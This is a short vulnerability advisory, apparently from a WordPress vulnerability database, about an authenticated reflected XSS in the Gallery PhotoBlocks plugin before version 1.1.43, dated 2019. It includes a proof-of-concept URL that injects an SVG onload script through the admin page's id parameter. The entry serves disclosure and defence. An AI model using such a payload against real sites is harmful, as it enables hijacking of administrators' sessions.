WordPress Plugin Vulnerabilities
Gallery Photoblocks < 1.1.43 - Authenticated Reflected XSS
Description
The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
Proof of Concept
When logged in with an account with administrator capabilities: https://<BLOG>/wp-admin/admin.php?page=photoblocks-edit&id="><svg/onload=alert(/XSS/)>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2019-07-09 (about 4 years ago)
Added
2019-07-09 (about 4 years ago)
Last Updated
2020-08-07 (about 3 years ago)